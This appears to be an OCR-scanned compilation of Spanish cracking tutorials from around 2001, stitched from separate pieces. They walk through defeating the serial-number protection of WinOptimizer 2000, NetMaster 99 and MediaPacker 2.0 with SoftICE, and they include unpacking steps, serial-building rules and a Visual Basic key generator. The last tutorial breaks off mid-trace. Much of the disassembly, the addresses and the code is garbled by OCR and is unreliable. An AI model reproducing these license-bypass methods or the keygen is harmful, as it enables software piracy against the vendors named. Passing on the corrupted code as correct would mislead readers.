Pattern found at 0030:8063B9D2 (8063B9D2) -> Respuesta de Softlce. 

S -> Otra vez por si acaso... 

Pattern found at 0030:COF4EEA2 (COF4EEA2) -> Ok, el eco de la busqueda. 


Solo una localización y por encima de la posición 80000000 (¿habeis leido los tutoriales de +ORC?), ponemos un 
break point en ese rango de memoria: 


BPR 30:3063B9D2 30:5063B9D2+A RW 


Es decir queremos que se interrumpa la ejecución del programa cuando se lea o se escriba (parámetros RW) en la 
posición de memoria ocupada por nuestro Serial de prueba. Como el Serial tiene 10 caracteres tenemos que especificar 
también el rango que ocupa, que va desde la posición encontrada en la busqueda hasta 10 posiciones mas, de ahí el +A 
(10 decimal = A hexadecimal). 


Crtl+D y volvemos al programa, hacemos click en Register y saltamos a Softlce, ¿donde?, adivina... en el estupendo y 
casi infalible Kernel!HMEMCPY, (estoy trabajando con Win98), bien ya hemos encontrado la función que hace 
saltar a Softlce, tomemos las notas adecuadas para los intentos posteriores. ¿No pensarás que esto sale a la primera, 
verdad? 


F12 hasta salir al programa en WINOPTIMIZER2000:CODE+00026469, de ahí F10 pasando por varios ret y un bucle que 
menea al Serial de arriba abajo durante un rato, por fin llegamos aquí: 


:00465323 8B45FC mov eax, dword ptr [ebp-04] (**) 

:00465326 ESD9F6FFFF call 00464A04 - > Aquí se genera el Serial. 
:0046532B F7D8 neg eax 

:0046532D 1BDB sbb ebx, ebx 

:0046532F F7DB neg ebx 

:00465331 84DB test bl, bl -> Vaya, vaya... 

:00465333 754A ¡ne 0046537F -> El salto crucial... 

:00465335 6A00 push 00000000 

:00465337 8D55FO lea edx, dword ptr [ebp-10] 


(*) El código está tomado de W32dsm89 


Parece ser que todo se realiza en el call 00464A04 así que vamos a entrar a ver que encontramos. Para abreviar y no 
quedar empantanados en un follón de llamadas, subllamadas, saltos atras y demás, iré directamente al grano. Entramos 
con F8 y avanzamos con F10 hasta aquí: 


:00464A53 8D45FC lea eax, dword ptr [ebp-04] -> Longitud del Serial, 0ÓxAh en nuestro caso. 
:00464A56 E875FOF9FF call 00403ADO0 -> Aquí se comprueba que no sea 0. 

:00464A5B 8B45FC mov eax, dword ptr [ebp-04] -> La longitud del Serial en EAX, 
:00464A 63 83F812 cmp eax, 00000012 -> Comprobación del número de caracteres. 
:00464A66 0F3540020000 jne 00464CAC -> Nos manda fuera... 

:00464A6C 8B45FC mov eax, dword ptr [ebp-04] 

:00464A6F E8C4020000 call 00464D38 


Bueno, ya tenemos algo en claro, el Serial tiene 0x12h carateres de largo, en decimal 18. Aquí comprobamos también 
que nos sobra más de la mitad del espacio de la ventana de registro. Tanto espacio está puesto para acojonarnos y 
hacernos creer que el Serial es largo y complicado. 


OTRA PRUEBA 


Limpiamos el bp de antes mediante un BC * y aprovechamos para poner otro haciendo doble click en la instrucción 
:00464A63 cmp eax, 00000012, salimos y ponemos otro Serial de prueba esta vez con 18 caracteres, algo así como 
1234567890ABCDEFGH, como ya tenemos el bp puesto en la instrucción que compara el número de caracteres del 
Serial, volvemos a aterrizar allí cuando salte SoftIce. 


Veamos lo que sigue: 


:00464A63 83F812 cmp eax , 00000012 -> Volvemos a estar aquí. 

:00464A66 0F8540020000 jne 00464CAC -> Esta vez no... 

:00464A6C 8B45FC mov eax, dword ptr [ebp-04] -> EAX=12, el número de caracteres de nuevo. 
:00464A6F E8C4020000 call 00464D38 -> Entramos a esta llamada... 


CALL 00464D38 
Entramos en el call 00464D38, seguimos con F10 y al rato encontramos el siguiente bucle: 


:00464D5D 8B4DFC mov ecx, dword ptr [ebp-04] -> Dirección del Serial de prueba. 
:00464D60 48 dec eax -> EAX hace de contador, ojo que empieza con 1. 

:00464D61 3B41FC cmp eax, dword ptr [ecx-04] -> Número de caracteres del Serial. 
:00464D64 7205 jb 00464D6B -> ¿Es menor?, entonces saltamos... 

:00464D65 ESFDDFF9FF call 00402D68 

:00464D6B 40 inc eax -> Aquí, EAX vuelve a ser 1. 

:00464D6C 8A4C01FF mov cl, [ecx+eax-01] -> Posición del carater a manipular. 
:00464D70 0FB7D2 movzx edx, dx -> Amplia DX a EDX. 

:00464D73 81E1FF000000 and ecx, 0OOO000FF -> Deja en ECX el valor hex del caracter. 
:00464D79 03D1 add edx, ecx -> Lo suma a EDX. 

:00464D7B 7105 jno 00464D82 -> Saltando a... 

:00464D7D ESEEDFF9FF call 00402D70 

:00464D82 8 | FAFFFFOOOO cmp edx, OOOOFFFF -> Esta comparación de control. 
:00464D88 7605 jbe 00464D8F -> Saltamos de nuevo... 

:00464D8A ESD9DFF9FF call 00402D68 

:00464D8F 40 inc eax -> Aquí, donde se incrementa el contador. 

:00464D90 83F80E cmp eax, OE -> ¿14 caracteres?, ¡lo tenemos! :-))) 

:00464D93 75C8 jnz 00464D5D -> Volvemos arriba. 


Parece que vamos avanzando y ya sabemos algo más. El código coge los valores de los 13 primeros caracteres de 
nuestro Serial de prueba y los suma uno por uno, acumulando el resultado en EDX (14-1 = 13 caracteres, atención con 
EAX que empieza de 1). Lo que está haciendo realmente es la siguiente suma hexadecimal 


314+32+334+34+35+4+36+37+38+394+30+41+42+43 = 2D3 -> Valor final de EDX. 


Tomamos las oportunas notas y seguimos avanzando. El programa se lia a continuación en un espantoso follón donde 
ese valor (2D3) es llevado de aquí para alla, realizando innumerables comparaciones para al final acabar poniendole un 
O delante y dejarlo convertido en 02D3, (como 15 minutos trazando código). Este es el valor de EAX después del 
retorno del call 00464D38. |:-( 


LAS COMPARACIONES 


Bueno, pues en algún sitio tendrá que comparar esto ¿no?, efectivamente, después de otro montón de vueltas arriba y 
abajo, encontramos este código más que sospechoso: 


:00464C01 8B45F8 mov eax, dword ptr [ebp-08] -> En EAX está la dirección de 02D3. 
:00464C04 8B55F4 mov edx, dword ptr [ebp-0C] -> En EDX la dirección de EFGH. 

:00464C07 ESB8F1F9FFE call 00403DC4 -> Aquí dentro se realiza la comparación. 

:00464C0C 7504 jne 00464C12 -> EAX tiene que ser 0. 

:00464C0E C645F301 mov [ebp-0C], 01-> Planta un 1, esto será comprobado luego. 

:00464C12 8D45F8 lea eax, dword ptr [ebp-08] -> La dirección del Serial. 

:00464C15 50 push eax -> Guardala. 

:00464C16 B903000000 mov ecx, 00000003 -> Prepara los contadores para la 

:00464C1B BA01000000 mov edx, 00000001-> siguiente comparación dentro de call 00403DC4. 
:00464C20 8B45FC mov eax, dword ptr [ebp-04] -> Número de caracteres del Serial. 

:00464C23 E890F2FOFF call 00403EB8 -> Se manipula el Serial y coge los 3 primeros caracteres. 
:00464C28 8B45F8 mov eax, dword ptr [ebp-08] -> En EAX la dirección de 123, 

:00464C2B BA1C4D4600 mov edx, 00464D1C -> La dirección de un valor fijo. 

:00464C30 ESSFEFLF9EFF call 00403DC4 -> Otra comparación aquí dentro. 

:00464C35 7504 jne 00464C3B -> EAX tiene que ser 0. 

:00464C37 C645F101 mov [ebp-0F], 01 -> Otro 1 que luego se comprueba. 


La llamada al código que realiza las comparaciones se repite dos veces más un poco más abajo, así que para no 
aburriros mucho y dado que el código es más o menos el mismo pasaremos directamente a echar un vistazo dentro del 
call 00403DC4. La comparación de los cuatro últimos caracteres se realiza aquí: 


:00403DED 8B0E mov ecx, dword ptr [esi] -> Valor obtenido en la suma, [02D3]. 

:00403DEF 8B1F mov ebx, dword ptr [edi] -> Los cuatro últimos caracteres, [EFGH]. 

:00403DF1 39D9 cmp ecx, ebx -> Aquí podemos cambiar manualmente EBX para que sean iguales. 
:00403DF3 7558 ¡ne 00403E4D -> Pues eso... 

:00403DF5 4A dec edx -> EDX a 0. 

:00403DF6 7415 je 00403E0D -> Nos vamos... 


Las comparaciones del resto se realizan un poco más abajo, aquí exactamente: 


:00403E19 8B0E mov ecx, dword ptr [esi] -> [ESI] = 123. 

:00403E1B 8B1F mov ebx, dword ptr [edi] -> [EDI] = Primer valor fijo, :-) 
:00403E1D 38D9 cmp cl, bl -> Esta vez cambiamos ECX manualmente para que sean iguales. 
:00403E1F 7541 jne 00403E62 -> Sin problemas... 

:00403E21 4A dec edx -> El contador. 

:00403E22 7417 je 00403E3B -> Saltaremos al comprobar el segundo valor fijo. 
:00403E24 38FD cmp ch, bh -> Siguen las comparaciones 

:00403E26 753A ¡ne 00403E62 -> Nada que hacer... 

:00403E28 4A dec edx -> Decrece el contador. 

:00403E29 7410 je 00403E3B -> Saltaremos en la comprobación del tercer valor fijo. 
:00403E2B 81E30000FF00 and ebx, OOFFO00O -> Limpia BX. 

:00403E31 81E10000FF00 and ecx, OOFFOO0O -> Limpia CX. 

:00403E37 39D9 cmp ecx, ebx -> La última comparación... 

:00403E39 7527 ¡ne 00403E62 -> Perfecto... 

:00403E3B 01C0 add eax, eax -> Una suma que será comprobada más adelante. 
:00403E3D EB23 ¡mp 00403E62 -> Nos vamos... 


Como he comentado arriba, la llamada a este fragmento de código se repite dos veces más, las comparaciones se 
realizarán con otros dos valores fijos diferentes por este orden, 6? caracter, y finalmente los caracteres 4? y 5*. 


RESUMEN Y CONCLUSION 
Aquí va la explicación completa del proceso de formación y comprobación del Serial: 


-. El programa coge los 13 primeros caracteres del Serial. 

-. Suma sus valores hex, al resultado le pone un cero delante. 

-. Lo compara con los cuatro últimos caracteres del Serial. 

-. Luego coge los tres primeros, los compara con un valor fijo. 

-. Coge el sexto caracter y lo compara con otro valor fijo. 

-. Finalmente coge los caracteres que ocupan las posiciones 4* y 5* y los compara con otro valor fijo. 


Así que un Serial válido para obtener la versión completa de este programa consta de las siguientes partes: 
-. Los seis primeros caracteres que son fijos y vienen definidos por el programa. 
-. Siete caracteres cualquiera cuyo valor será sumado a los anteriores. 
-. El decimocuarto caracter que va por libre. 


-. El decimoquinto que es un 0. 
-. Los tres últimos que son el resultado de la suma de los 13 primeros. 


Incluso con un poco de habilidad y la calculadora del Windows puedes personalizar tu serial: 


22?22?2?ARKANIANO0O??? 
GJE, JE, JE!) 


El resultado es inmediato y de lo más satisfactorio, como se puede comprobar: 


/ a Thank. you for purchasing the full version! 

J) All restrictions have now beer removed. 
The barmer advertising will no longer be displayed. 
Please restart the program to apply the changes. 


FINALIZANDO 


Bueno, pues creo que esto es casi todo, ya se que me dejo cosas, por ejemplo ¿Que pasa después del testeo de bl y el 
"Salto crucial”?, ¿Que pasa si invertimos ese salto?, ¿Como sabe el programa que tipo de Serial es?, ¿Donde se 
realizan las comprobaciones al reiniciar el programa para aplicar los cambios? 


Esas y otras preguntas quedan por cuenta tuya. Si quieres acabar de desmenuzar el programa y necesitas alguna 
aclaración estoy en: arkanian O mailcity.com 


Saludos y hasta otra. 
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Programa: Net Master99 v1.1 


PROTECCION: NeoLite 2.0 -—- Name/Registration Key. 


Descripción: Programa para optimizar la conexión de INTERNET. 


Obtener Registration Key (Número Serie) válido para registrarnos 
y Crear un Generador de Claves en Visual Basic. 


Dificultad: Novato, Facililla, Media, ETC. 


OBJETIVO: 


DOWNLOAD : http: //www.magellass.com 

cananea Numega SoftIce 4.05, file insPEctor 4.2001 (similar), ProcDump32 
AR AS v1.6 Final, W32Dasm v8.93 (opcional), Visual Basic 6 

CRACKER: 

FECHA: 27-03-2001 


| INTRODUCCION 


NetMaster 99 es una herramienta especialmente diseñada para configurar y personalizar Internet sobre el 
"maravilloso" entorno Windows 95/98. Desde el ajuste del NDI cache, IPMTU, RevWindow, MaxMTU, Boost 
modem transfer speed, etc.), y el acceso a las opciones ocultas del Internet Explorer y Outlook Express. 


También dispone de Consejos y Trucos para mejorar nuestra productividad. Antes de comenzar el atake, hay que tener 
claro, las Herramientas que vamos a emplear, en esta "Victima" emplearemos en una primera aproximación una 
herramienta llamada file insPEctor 4.2001 - ViPER[K-FoR], nos dirá si nuestra "victima" esta empaquetada, 
compilador, etc, ... Toda esta información nos ayudara para un atake más rápido. 


Pues, nada vamos al aaaaaattttttaaaaaaaakkkkkkkkeeeeee....... 


AL ATAKE 


Arrancamos el file insPEctor 4.2001 y cargamos nuestra "victima" y observamos lo siguiente en pantalla: 


(8) file insPEctor v4.2001 


En] Datos PE | +] Secciones | $ Importaciones/Exportaciones 
e E Modificar | Mo] Herramientas | 0 Acerca de... 


Reconocimiento de signaturas 
Comprimido con Neolite 2.0 


Signatura: 


<E9 A6 00 00 00 52 DC 51 00 18 C1 51 001€ Ci 
51 00 00 00 00 00 52 42 00 00 04 C4 51 00 4€ 65 
6F 40 69 74 65 20 45 78656375 74 61 62 > 


Versión de la DLL: [2.1 EA Información... 


Versión del SO: fi 0 Versión de la imagen: fo.o 
Versión del enlazador: [2.25 Versión del subsistema: fa.o 


Pulsa espacio para ver los niveles de Ni S a : 
ión (3 Abrir archivo... ÉY Analizar GF Salir 


C:Márchivos de programa'NetkMaster I9Nm99. exe 


Pues ya esta, nos dice que el Net Master99 esta Comprimido con NeoLite 2.0 


El siguiente paso será, emplear la herramienta ProcDump32 v1.6 Final un excelente UnPacker (o desempaquetador;)), bien 
ejecutamos el ProcDump32 v1.6 Final y seleccionamos nuestra "victima" - Net Master99 y pulsamos el botón [Unpack] esperamos 
hasta que nos aparezca la ventana "Select Filename for saving...'' en mi caso, lo llamaré "Nm99_ECD.exe" a que soy original;) 
jejeje. 


=151 xi 


Unpack 
c:4win98setsystemikemel32. dil - 
c:win98setsystemimsgsrv32.exe Rebuild PE 
c:win98selsystemimprexe.exe | "Unknown* : 
c:win98sersystemimmtask.tsk  [Aspack<108 PE Editor 
c:win98setsystemimstask.exe Aspack108 Cancel 

c:win98set explorer.exe Aspack108.2 


ÓS Aspack108.3 
c:4win98seMtaskmon.exe Aspack108.4 0 


Aspack2000 

Module CodeSafe 3.< 
Hasiuk*NeoLite 
Manolo 


Bhrama Server 


User Conf. 


La siguiente aproximación, será averiguar en que lenguaje ha sido programado, como mera curiosidad;) y que mejor para esto, 
emplear el file insPEctor v4.2001. 


Pues, ya esta, nos dice que el Net Master99 esta Compilado en Borland Delphi 3.0 


(9) file insPEctor v4.2001 


Secciones | $ Importaciones/Exportaciones 
“3 Modificar | Cf Herramientas | 0 Acerca de... 


Reconocimiento de signaturas 
Compilado con Borland Delphi 3.0 


Signatura: 


<55 8B EC 83 C4 F4 53 B8 2C EC 49 DD ES 97 9F 
F6 FF 8B 1D 00 EA 49 00 68 E4 BF 49 00 64 00 
5A 00 ES 57 AD F6 FF ES 02 41 F6 FF 3D B7 00 > 


Versión de la DLL; f2.1 E Información... 


Versión del SO: fi ¿0 Versión de la imagen: fo.o 
Versión del enlazador: [2.25 Versión del subsistema: fa.o 


Pulsa espacio para ver los niveles de G AAA Arabia (9 Ao ge salir 
compresión ca 


[C:Várchivos de programa NetMaster 99Nm99_ECD.exe | 


El siguiente paso será tracearlo, con el SoftICE emplearemos en este caso, el BP (BreakPoint) KERNEL'HMEMCPY, 
para "matar 2 pájaros de 1 tiro";), es decir: 


1”. Capturaremos el Serial Válido para nuestro Name. 
2”. Estudiaremos la Función de Generación del Serial. 


SoftICE v4.05- Capturar Serial para *FREGISTRARNOS* 


Name: +ErOser 
Serial: 999666999 <...-- Serial Dummy 


NetMaster 99 Registration 


Please enter your user name and registration code, 
EXACTLY as they appear on the instruction. 


User Name z [+ Oser 


Registration Code : [999666999 
OK Register Later | Order Form | 


Ejecutamos de nuevo el programa "victima" previamente cargado nuestra herramienta favorita SoftICE (cual sino:)) 


Repetiremos los pasos para Registrarnos y antes de pulsar el botón [OK], retornamos al SI (SoftICE) pulsando (Ctrl-D) y 
establecemos el BreakPoint 


:BPX HmemCpy 
Retornamos al programa "victima" pulsando (Ctrl-D) pulsamos el botón [OK]. 


Pantallazo, aparecemos en el SI, pulsamos [F12] y [F11] para tracear el Serial introducido, visualizando la siguiente información: 


015F:9EA3 CA0800 RETF 0008 


KERNEL'HMEMCPY 
|015F:9EA6 55 PUSH BP<ooococmmnmmmnn Aparecemos aquí 
015F:9EA7 8BEC MOV BP, SP 


015F:9F20 F36766A5 REPZ MOVSD<----=--- D ESI (visualizamos Serial Dummy=999666999) 
015F:9F2A F367A4 REPZ MOVSB<----====- ? EDI (nos indica el tamaño del Serial=9) 


[F10] traceamos, hasta llegar a lo siguiente: 


EAX=0C19B5F4 EBX=0100E204 ECX=00000000  EDX=00FCA1B0  ESI=0078E640 
EDI=0078E640 EBP=0078E4C8 ESP=0078E640 EIP=0049AAA1 
CS=017F DS=0187 SS=0187 ES=0187 FS=2E27 (GS=0000 SS:0078E4B8=00000000 


*eax = Error evaluating expression (1) 
*ebx = 42218C 

*ecx = DSCA0OF9E 

*edx = 4052452B 


:0049AA91 CALL 0042D55C 

:0049AA96 MOV EDX, [EBP-08] 

:0049AA99 MOV EAX, [EBP-04] 

:0049AA9C CALL 0049A984 ; Función Generación Serial ---> tracearemos con [FS] 
:0049AAA1 LEA EDX, [EBP-10]  ;¡ EAX = Serial Válido 

:0049AAA2 CALL 00403A3A 

:0049AAA3 RET 


:2 EAX 
0C19B5F4 0203011572<--..-.- Serial Válido para nuestro Name 


Name: +ErOser 
Serial: 203011572 


Introducimos el Serial 203011572 para el Name+Er Oser y voilá, nos aperecerá el mensaje : 


"NetMaster99 has been registered successfully!" 


(D Estudio de la Rutina de Generación del Key 


¡Veamos que nos enseña la función CALL 0049A984, la podemos estudiar de varias formas : (1) "Listado Muerto" con el 
W32Dasm 8.93, o bien, (2) Traceando con el Softlce, personalmente prefiero esta última;). 


[(---- Primer Búcle desde :0049A9D0 hasta :0049A9E4 

1:004949D0 MOVSX ESI, AX 

:004949D3 MOV EDIL, [EBP-04] 

1:004949D6 MOVZX ESI, BYTE PTR [ESI+EDI-01] ;toma 1” valor ASCH del name y lo deja en ESI 
1:0049A9DB ADD EBX, ESI ¡acumula el valor en EBX 

:0049A9DD ADD AX, 02 ;incrementa el contador en 2, es decir, apunta al 3” valor 

1:0049A9E1 CMP CX, AX 

1:0049A9F4 JGE 0049A9D0 

¡(---- Segundo Búcle desde :0049A9E6 hasta :0049A9FB 

1:0049A9E6 MOVSX EAX, DX 

1:0049A9EC MOVZX EAX, BYTE PTR [EAX+ESI-01] ¡toma 2* valor ASCII del name y lo deja en EAX 
1:0049A9F1 ADD [EBP-08], EAX  ;acumula el valor en [EBP-08] 

1:0049A9F4 ADD DX, 02 ;incrementa el contador en 2, es decir, apunta al 4” valor 

1:0049A9F8 CMP CX, DX 


| 1:0049A9FB JGE 0049A9E6 


:0049A9FD IMUL ECX, EBX, 00022713 ¡ECX = EBX * 22713h 

:0049AA03 MOV EAX, [EBP-08] ;copia el valor de EBP y dejalo en EAX 
:0049AA06 IMUL EAX ¡EAX =EAX * EAX 

:0049AA08 LEA EAX, [ECX+EAX+D72DD7] ¡EAX =ECX + EAX + D72DD7h 
:0049AA0F LEA ESTI, [EAX*2+EAX] ¡;ESI = EAX * 2 + EAX 

:0049AA1F LEA EAX, [EBP-04] ¡apunta al Name "+ErCOser" 

:0049AA22 CALL 00403434 

:0049AAA1 LEA EDX, [EBP-10] 

:0049AAA4 CALL 00407D7C 

:0049AAA9 XOR EAX, EAX 


Recapitulemos, desde la dirección :0049A9D0 hasta :0049A9E4 un búcle FOR AX=1 ... TO ... STEP 2 NEXT extrayendo 
del Name el valor ASCII y acumulando la suma ASCII en EBX y el segundo búcle desde la dirección :0049A9E6 hasta 
:0049A9FB un búcle FOR DX22... TO ... STEP 2 NEXT extrayendo del Name el valor ASCII y acumulando la suma 
ASCH en EAX después multiplica EBX * 00022713 guardando el resultado en ECX, multiplica EAX por sí mismo, 
suma EAX + ECX + D72DD7, y finalmente realiza la siguiente operación EAX * 2 + EAX guardando el resultado 
en ESL 


* Key Generator NetMaster99 v1.1 en Visual Basic 6 * 


' Nombre : Net Master99 v1.1 Keygenerator 

' Autor : +ErOser'2000 [fOR tHE nEW mILLENNIUM] 

' Creado : Martes, Marzo 27,2001 E' 00:45:22 pm (Vers: 1.0.0000) 
' Herramientas: Softlce 4.05, Visual Basic 6 


' Descripción : Net Master99 v1.1 


Private Sub Text1_Change() 
Dim nombre As String 
Dim L As Integer, x As Integer, y As Integer 
Dim eax As Long, ebx As Long, ecx As Long, esi As Long 
nombre = Trim$(Text1.Text)xt) 'quitamos blancos 
L = Len(nombre) 
ebx =0 
'I Bucle desde :0049A9D0 hasta :0049A9E4 
For x = 1 To L Step 2 
esi = Asc(Mid$(nombre, x, 1)) 
ebx = ebx + esi 
Next x 
eax =() 
'II Bucle desde :0049A9E6 hasta :0049A9FB 
For y = 2 To L Step 2 
esi = Asc(Mid$(nombre, y, 1)) 
eax = eax + esi 
Next y 
ecx = ebx * £H22713 'IMUL ECX, EBX, 00022713 
eax = eax *eax 'IMUL EAX 
eax = ecx + eax + £«HD72DD7 'LEA EAX, [ECX+EAX+00D72DD7] 
esi =eax *2+eax 'LEA ESI, [EAX*2+EAX] 
Text2.Text = esi 'Visualizamos el Serial 
¡End Sub 


Mu AAA2> A 2  — A _ AA  _ _ _ _ _— | 
Un Saludo! 


+ErOser'2000 
fOR tHE nEW mILLENNIUM 


-=AW- Your Mind ls the Power -/VV=- 


o ++ Agradecimientos +----- - 
Karpoff, Demian, Black Fenix, PrOfesor X, Numit_oR, Esiel 2, Mr. Crimson, Mr. WhiTe, Mr. GReeN, TNT, WKT, KUT y a 
TODOS los CrAcKeRs del Pasado, Presente y Futuro. 
om Hom Gr eetzannooo...--- He - 
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Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
MediaPAcker 2.0 


Serial. 


Buscar un Numero de Serie valido 


Newbie 


http://www.Microdream.com 


Softice 


SiLvEr StOrM 


INTRODUCCION 


FECHA: 29 de marzo 2001 


Esto de la introduccion es lo que me parece mas fastidioso de hacer un tutorial. pero bueno que le hacemos..aqui vamos de 
nuevo a buscar un serial valido, y a tengo 10 tutoriales.. gracias a todos Uds...(por tener paciencia de leerwelos), espero que lo 


entiendan y les sea util. Recuerden que este tutorial esta hecho con fines netamente educativos si les interesa este 
Programa COMPRENLO. 


AL ATAKE 


Comentario del Programa 


e El programa que vamos a Busacr es un programa que les genera un archivo ejecutable desde archivos HTML, 
Mediapacker is a software que te deja crear ebooks facilmente. Usando Mediapacker tu puedes compilar 
paginas html que incluyan text, imagenes, fotos, sonidos, animaciones and movies en un portable compacto y 


atractivo E-book 


Objetivos 


1. Busacr el Serial Valido 


Manos a la Obra 


Primero instalamos nuestro programa , luego lo revisamos con File Inspector 


(9) file insPEctor 4.2 - Service Pack 1 


| E Cabezera MZ | 1] Secciones | :S Importaciones/Exportaciones | 
Y Modificar | 4 Herramientas | Sé Plug-Ins 0 Acerca de... | 


"Reconocimiento de signaturas 
Comprimido con ASPack y1.08.04 
Signatura: 
<60 Es 70 05 00 00 EB 4€ 00 00 00 00 00 00 00 


00 00 00 00 00 87 DB 90 00 40 46 00 10 40 4B 00 
D4 64 4B 00 10 60 48 00 00 00 00 00 00 00 > 


Versión de la DLL: f2.1 4 Información... 


Versión del SO: fi 0 Versión de la imagen: fo.o 
Versión del enlazador: [2.25 Versión del subsistema: fa. 


Pulsa espacio para ver los niveles de S Abrir archivo o Aralar ge Salir 
compresión Es 


[C:Archivos de programaMicrodreamtMediapacker 2.04Mediapacker. exe | 


Vemos que esta comprimido con Aspack. Podemos hacer 2 cosas, para parcharlo tendriamos que desempaketar y 
desensamblar para luego parcharlo.... esta vez lo haremos buscando un serial Valido, por lo tanto omitiremos el 
desempaketado y lo haremos con SICE. 


Ok... jeje aqui comienza la aventura. 


Abrimos nuestro Objetivo... Pobre de el... jejeje no sabe lo que le espera... 


Mediapacker 2.0 mE 


Welcome 


Mediapacker is an application created with net marketers in mind, it will allow 
you to create your own multimedia information products from HTML pages 
into a single executable file that can be easily distributed. 


Mediapacker let's pou create: e-books, newsletters, manuals, reports, 
booklets, e-zines, catalogs, tutorials, presentations, educational applications, 
2 andanything else you can create with HTML code. 


“You can also distribute pour entire website as a sinale file for perfect and 
seamless off-line navigation. 


The only requirements to run this application are: 


- Microsoft? Wlindows 95/98/NT 
- MicrosoftS Internet Explorer 4 or above 


The wizard will guide you through the creation process... 


About... | Register... | Next >> | 


Presionamos Register... 


y veremos algo como esto: 


Register Mediapacker 


User name: 


[Silver StOrh 


Company: 


[aryC 


Serial number: 


fare 
X Cancel | 


Llenamos los spacios con nuestros datos: en mi casolo pongo como ven en esta pantalla 


Prueben uds. con sus propios datos. 


Seguimos con nuetro infalible plan de conseguir el serial en la siguiente seccion.. 
A BusKar El Zeryal 


Para la busqueda de serial ----- Presionamos Control D y abrimos Softice (sice). Ponemos un Breakpiont en 
HMEMCPY y salimos de Sice con Control D. 


Presionamos Ok. 
Slce se abre...desbilitamos los breakpionts.. BC * 


Y presionamos F12 7 veces para caer en el codigo del programa... pues como Uds. saben cuando usamos el hmemcpy 
pra interrumpir el programa no cae directamente en el codigo del programa, sino en una libreria de windows por lo 
tanto hay que llegar hasta el programa que queremos tracear... 


AAAAAAAAAAAAAÁAAAAAAAAAAA AA AAA A AA A A AAA A Abyte A AAAA4SA APROTAAA(O)AA 
015F:0073DABC 0D 00 00 00 0D 00 00 00-90 D2 €C7 00 0C 00 0000 ................ - 
015F:0073DACC 14 DB 73 00 47 11 43 00-90 D2 C7 00 0B 12 43 00 ..s.G.C.......C. 
015F:0073DADC 94 DC 73 00 94 DC 73 00-14 5A C6 00 44 AF 4A 00 ..s...s..Z..D.J. 
015F:0073DAEC 0C DB 73 00 01 00 00 00-10 DB 73 00 44 DE 73 00 ..s.......s.D.s. 
015F:0073DAFC F7 AF 4A 00 14 DB 73 00-E0 55 C7 00 90 D2 C7 00 ..J...s..U...... 
015F:0073DB0C 00 00 00 00 00 00 00 00-78 DC 73 00 68 25 43 00 ........ x.s.n%C.- 
AAAAAAAAAAAAAAAAAAAAAAA AA AAAAA AA AA AAA AA A AAA AA A A A A A AAPROT32A 
0157:00428C55 CALL 00434BD4 - 

0157:00428C5A POP ESI == ----- Caemos aqui.. 

0157:00428C5B POP EBX 

0157:00428C5C RET 

0157:00428C5D LEA EAX,[EAX+00] 

0157:00428C60 PUSH ESI 

0157:00428C61 MOV ESI,EAX 

0157:00428C63 MOV EAX,ESI 

0157:00428C65 MOV ECX,[EAX] 

0157:00428C67 CALL [ECX-10] 

0157:00428C6A MOV EAX,[004B58F0] 

0157:00428C6F CMP BYTE PTR [EAX],00 

0157:00428C72 JZ 00428C9D - 


AAAAALA AAA AA A AA A A A A A AA AMEDIAPACKER!CODE+00027C55sAAAAAAALALAA AAA 
Lo que esta en amarillo es donde vemos que estamos dentro del programa... Jeje 


Presionamos F10 23 veces--- por cierto F10 sirve para ir traceando linea por linea si por ejmplo hay un call el sice 
ejecuta este call y cae en la siguiente linea, si quisieramos entrar en el call tendriamos que presionar f8 sobre el para 
entrar. 


Ok.. de regreso.. si le dimos bien, veran que cuando ven el valor de EAX (d eax) vemos nuestro nombre.. 


AAAAAAAAAAAAAAAA AA AAAAA AAA AAA A AA A A AA A A byte A AAAAA AA APROTAAA(O)AA 
015F:00C7D290 53 69 4C 76 45 72 20 53-74 4F 72 4D 00 00 00 00 SiLvEr StOrM....- 
015F:00C7D2A0 50 52 00 00 79 00 00 00-19 00 00 00 E4 01 00 00 PR..y........... 

015F:00C7D2B0 01 00 20 00 00 00 00 00-00 00 00 0000000000 .. ............. 

015F:00C7D2C0 00 00 00 00 00 00 00 00-00 00 00 00 0000 0000 ................ 

015F:00C7D2DO0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 0000 ................ 

015F:00C7D2E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ - 
AAAAAAAAAAAAAAAAAAAAAAA AA AAA AA AAAAA AA AA A AA AA AAA AA A APROT32A 
0157:004AAF39 MOV EAX,[EBX+000002C8] - 

0157:004AAF3F CALL 004311E0 

0157:004AAF44 MOV EAX,[EBP-0C] 

0157:004AAF47 PUSH EAX 

0157:004AAF48 MOV EAX,[004B6AAS] 

0157:004AAF4D MOV EAX,[EAX+74] 

0157:004AAF30 CALL 00408C74 

0157:004AAF35 MOV ECX,EAX 

0157:004AAF57 MOV EDX,004AB00C 

0157:004AAF5C POP EAX 

0157:004AAF3D CALL 004AAA58 

0157:004AAF62 MOV EAX,[EBP-08] 

0157:004AAF65 MOV ECX,0000000F - 

AAAAAAAAA AA AÁAAAAAA AA AA A AA A A AMEDIAPACKER!CODE+000A9F39OAAAAAA LALALA 


Seguimos traceando hacia abajo... Presionamos F10 13 veces mas y vamos a ver de nuevo el valor de EAX. 
si siguieron bien deben ver nuestro serial... que es de 15 caracteres. 


AAAAAAAAAAAAAAAAAA AA AAA AA AA AA A AA A A AA A AbyteA AAAA AA APROTAAA(O)AA 
015F:00C7D2D4 44 45 36 32 38 41 39 41-35 45 45 45 32 38 31 00 DE628A9A5EEE281.- 
015F:00C7D2F4 00 00 00 00 00 00 00 00-00 00 00 00 00 00 0000 ................ 

015F:00C7D2F4 74 00 00 00 67 00 00 00-7C EE 41 00 00 00 00 00 t...g...].A..... 

015F:00C7D304 00 00 00 00 60 D3 C7 00-84 D3 C700 A0D3 (700... ooocco..... 

015F:00C7D314 79 00 00 00 19 00 00 00-20 00 CC 00 AC FE 41 00 y....... ..... A. 

015F:00C7D324 CC D1 C7 00 A4 FE 41 00-CC D1 C7 00 00 00 0000 ......A......... - 
AAAAAAAAAAAAAAAAAAAAAAA AA AAAAA AA AA AAA AA Á AAA AA A A A A A AAPROT32A 
0157:004AAF65 MOV ECX,0000000F - 

0157:004AAF6A XOR EDX,EDX 

0157:004AAF6C CALL 004040F8 

0157:004AAF71 MOV EAX,[EBP-04] 

0157:004AAF74 PUSH EAX 

0157:004AAF75 LEA EDX,[EBP-0C] 

0157:004AAF78 MOV EAX,[EBX+000002D8] 

0157:004AAF7E CALL 004311E0 

